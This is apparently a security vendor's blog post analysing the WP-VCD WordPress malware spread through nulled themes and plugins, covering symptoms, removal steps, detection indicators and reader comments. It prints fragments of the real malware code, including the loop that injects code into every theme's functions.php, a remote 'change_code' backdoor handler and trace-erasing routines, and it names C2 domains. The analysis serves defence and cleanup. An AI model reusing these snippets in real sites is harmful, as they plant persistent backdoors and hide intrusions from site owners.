Is your website showing any of the following symptoms all of a sudden:

  • A lot of malicious pop-ups
  • redirecting to unsolicited websites
  • Showing spam URLs
  • Getting slowed down due to high CPU usage (someone might be stealing your resources)
  • Website suspended by the host

Then there is a high chance that you are infected with WP-VCD malware.

The WP VCD malware gets a foothold in your site by leveraging loopholes in outdated plugins and themes. In most WP-VCD cases, the web owners infect themselves by installing a free/nulled plugin & themes from unauthorized sources, while in others it occurs as a result of contamination by infected sites.

It’s been a while since WP-VCD malware made its first appearance but the campaign is still going on with full fervor. In fact, most infections in WordPress sites result from WP-VCD malware.

See the graph below:

As many as 56% WordPress website infections happen from infected plugins. Additionally, infections by themes make up to 6% of the total WordPress infections.

What is WordPress WP-VCD Malware?

WP-VCD malware comes pre-installed with pirated versions of a paid theme/plugin. These nulled (pirated) themes and plugins contain malicious scripts that get deployed when you install them.

After setting its foot on your website through a nulled theme, it goes on to infect every other theme on your site. In the case of a shared server, this malware then propagates to infect each unprotected site hosted on that server.

 

Invariably, preventing WP-VCD infections are quite difficult as web owners install this malware voluntarily on their websites. The exceptionally good SEO done for these nulled themes & plugins makes the situation worse.

If you’ll search “Free [pugin name] download”, it’s almost certain that the top results would be of the WP-VCD malware distributing sites. This often traps web developers & designers into installing the malware.

An example of the WP-VCD malicious script is below:

$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';

$ping = true;
$ping2 = false;
if ($list = scandir( $themes ))
{
foreach ($list as $_)
{

if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
}
else
{
$ping = false;
}
}

}

else
{
$list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
foreach ($list2 as $_2)
{

if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
$ping2 = true;
}

What are the symptoms of wp-vcd malware?

  1. A New WordPress Administrator added without your knowledge
  2. Your hosting provider suspended your WordPress account because of wp-vcd malware attack to protect other websites
  3. Account suspension by the host due to excessive resource consumption
  4. SEO spam such as Japanese search results or Pharma attack in Google Search Results.
    Below is the screenshot of Google spam search results:
    wp-vcd hacked results in Google
    Related: WordPress spam search results and how to fix them.
  5. Unknown JavaScript code in the source of your website
  6. Pages on your website being redirected to shady websites
  7. Unknown PHP files in the wp-includes folder which are not there in the WordPress GitHub repository
  8. PHP files in the wp-content/uploads directory and it’s sub-directories
  9. Malware scanner flags WP-VCD on your website.
    WP-VCD malware
    Astra’s malware scanner flagging WP-VCD

Why were you infected with wp-vcd Malware?

The reason behind the infection could be plenty. Most common of which are:

  1. Use of a nulled theme – the wp-vcd malware in many cases comes pre-installed with every downloaded theme from nulled theme websites
  2. Use of outdated WordPress plugins & themes for your site.
  3. No Web Application Firewall (WAF) installed to block hacking attempts made by hackers

How does WP-VCD malware work?

Getting to the part where you’ve installed & activated the nulled theme.

The next thing WP-VCD does is create backdoors on your website. Usually, this is done by adding hidden WordPress admin users.

These user accounts are regulated remotely by a chain of WP-VCD perpetrators via a vast command and control (C2) infrastructure. Hackers get a tight grip on your website through these backdoors. This is how they reinfect your site after every partial cleanup.

Some variants of the malicious codes have been seen to modify core WordPress files. Sometimes, they also add new files in the /wp-includes directory.

Long story short, this is what happens in a WP-VCD malware hack:

  1. The WP-VCD malware creates Spam URLs on the website (also referred to as URL Injection)
  2. The malware creates a backdoor which allows hackers to have access to your website for extended periods
  3. Hackers are able to exploit vulnerabilities in WordPress plugins & themes. These plugins  & themes when installed upload the WP-VCD malware on vulnerable sites.
  4. WP-VCD expands to unprotected sites on the same server and gets a more strong grip.

Such a hack could have been avoided with a Web Application Firewall (WAF) and regular malware scanning. It is also essential to check modification of WordPress core files, plugins & themes.

Analysis of what WP-VCD malware does?

Deploys Malicious scripts

In the functions.php file within your theme, you would see some code similar to this:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

This code checks if there are deployer scripts available and subsequently executes them. As you can see in the code above, the file that’s been called is the class.theme-modules.php file. Now, depending on where the infection emanates from (i.e. theme or plugin), the malicious script will be in file class.theme-modules.php or class.plugin-modules.php respectively.

In the example above, it is the class.theme-modules.php file that actually installs the wp-vcd malware into the other themes installed (enabled/disabled) and creates all the other malicious files.

Creates Backdoor

Code snippet of the malware code:

<?php
 
//install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2); 
DEFINE('MAX_ITERATION', 50); 
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);

$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...(base64-encoded string of PHP code)
...

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
 @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
 if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
 @file_put_contents('wp-tmp.php', $tmpcontent);
 }
 }

As we had discussed in the earlier section, this code would create a new admin user with a name similar to 100010010. The objective of this backdoor admin account is to make sure that the hacker is able to access the website even if you delete the malicious code – basically, so that the attackers could attack your website at a later point in time.

Besides providing the hacker with another access to the site, backdoors perform several other functions for hackers. Primarily, these backdoor:

  1. Adds more backdoors
  2. Gets more instructions from hackers

Adds more backdoors

WP-VCD conspirators can use backdoors to add any new code in the function.php file. Here is how:

case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;

With the change_code feature in already injected backdoors, the hacker can inject any ‘new code‘ in your site.

Gets instructions from hackers

Sometimes hackers inject URLs of their C2 servers. These URLs are later called to deploy action across the infected sites in one go. Domains such as www.krilns.com/code.php​, ​krilns.pw​, ​krilns.top, etc have been found executing this in many WP-VCD infected sites.

Infects other files and sites

The next thing that the WP-VCD malware does is to expand itself. It deploys the malicious script in every theme and plugin on your site. Next, it goes on to find vulnerable sites on the same server and infects them too.

This propagation starts with the deployment of a script located at wp-includes/wp-vcd.php​. It’s followed by modifications in the core wp-includes/post.php​ which at last execute the code in ​wp-vcd.php​ on every page.

Destroys the trails

As a final step, the WP-VCD malware removes the original signs of infection from the theme/plugin. If you will look closely the following code, you’ll see how preg_replace () is used to remove all contents between install_code and install_code_end.

if ($file = @file_get_contents(__FILE__)) { $file = preg_replace('!//install_code.*//install_code_end!s', '', $file); $file = preg_replace('!<\?php\s*\?>!s', '', $file); @file_put_contents(__FILE__, $file); 
}

Infected by the wp-vcd malware? Drop us a message in the chat widget and we’ll be happy to help. Click here for immediate malware cleanup

How to remove the wp-vcd malware infection

With Astra, you can remove the infection with a click of a button. Simply run a scan with Astra’s malware scanner and remove the infected files right from the dashboard.

If you have not yet tried Astra’s one-click malware removal, get it from here. To remove WP-VCD manually read on.

First things first, search for occurrences of the below files/strings on your server and examine their contents.

Run a diff check of the file contents with corresponding files in the WordPress core GitHub repository or theme/plugin directory. You can use either of the approaches (or both) using SSH or using your IDE.

Approach 1 – Search for files on the server that are usually infected with the wp-vcd hack

  1. wp-includes/wp-vcd.php
  2. wp-includes/wp-tmp.php
  3. wp-content/themes/*/functions.php (all themes installed on the server whether active or not)
  4. class.wp.php
  5. admin.txt
  6. codexc.txt
  7. code1.php
  8. class.theme-modules.php (inside the theme folder)

Approach 2 – Search for string patterns that are found in infected malware files

  1. tmpcontentx
  2. function wp_temp_setupx
  3. wp-tmp.php
  4. derna.top/code.php
  5. stripos($tmpcontent, $wp_auth_key)

Files such as wp-vcd.php, wp-tmp.php, class.theme-modules.php can be deleted off the server after any reference to them is deleted from all the active or inactive themes’ functions.php file or core WordPress files in the website root.

Check out this step-wise WordPress malware removal blog post for the full process. 

How to protect WordPress and stay secure from the backdoor

  1. Create a simple security strategy:
    1. Clean – Make sure your website files and database is 100% clean and malware-free
    2. Protect – Install a Web Application Firewall (WAF) to block re-infection attempts
    3. Monitor – Run regular malware scans to check if files/database have tampered
  2. Delete unused WordPress themes (even if disabled)
  3. Completely avoid Nulled themes on your website
  4. Update WordPress core, Plugins and themes

Here’s a complete video that you need to follow step by step to secure your WordPress site.

Cleaning infected websites with such malware is not always easy. Because, once they are activated on a website, they tend to infect other areas of the website too by installing the different type of malware codes.

Further, this particular malware also creates a backdoor that allows the bad guys to get complete control of your site. Hence, it is important to create an effective security strategy that does a thorough analysis of your website. And afterward completely removes the hack from your website.

Wordpress Malware removal steps

If you think you are hacked with this malware, do let us know. We are happy to help 🙂 Click here for immediate help.

Astra

At Astra, we have a team of security experts who daily resolve dozens of web security issues. Our web application firewall ASTRA protects your website 24×7 from XSS, SQL injection, bad bots, malware and 80+ other threats.

Take an Astra Demo now.

Was this post helpful?



Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

Ananda Krishna

Ananda Krishna is the co-founder & CTO of Astra Security, a SaaS suite that secures businesses from cyber threats. He has been acknowledged by the Indian Navy, Microsoft, United Airlines, etc. for finding critical security vulnerabilities in their systems. Winner of the Best Security Product at Global Conference on Cyberspace 2017 (awarded by Narendra Modi, Prime Minister of India) & French Tech Ticket, Paris (awarded by François Hollande, former President of France). At Astra he's building an intelligent security ecosystem - web application firewall (WAF), malware detection & analysis, large scale SaaS applications, APIs & more. He's actively involved in the cyber security community and shared his knowledge at various forums & invited talks.

10 Comments

  1. Thank you for this informative read, I have shared iit on Twitter.

  2. thank you very much for the detailed explanation.

    I have a question,

    I have cleaned the functions.php file from the snippet and deleted the wp-vcd.php file.
    search through the SQL for all the string patterns and found nothing.

    does it mean I’m safe?

    • Aakanchha Keshri

      Hi Ahiad, what you’ve done so far should remove the malware. We’ve also seen in some cases that wp-includes/wp-tmp.php get created which could store the backdoors. Removing these files removes the infection, but the vulnerability would also have to be identified and patched. To harden your WordPress’ security further you can use this free plugin here – https://wordpress.org/plugins/wp-security-hardening/

  3. That’s a really good point this Article is very helpful and informative. Thanks for sharing

  4. Thank you for this useful Article, That help me a lot

  5. Thanks a lot. I am currently experiencing this. At first I thought my host was just making life a living hell for me but now I realize. I will surely follow this guide.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close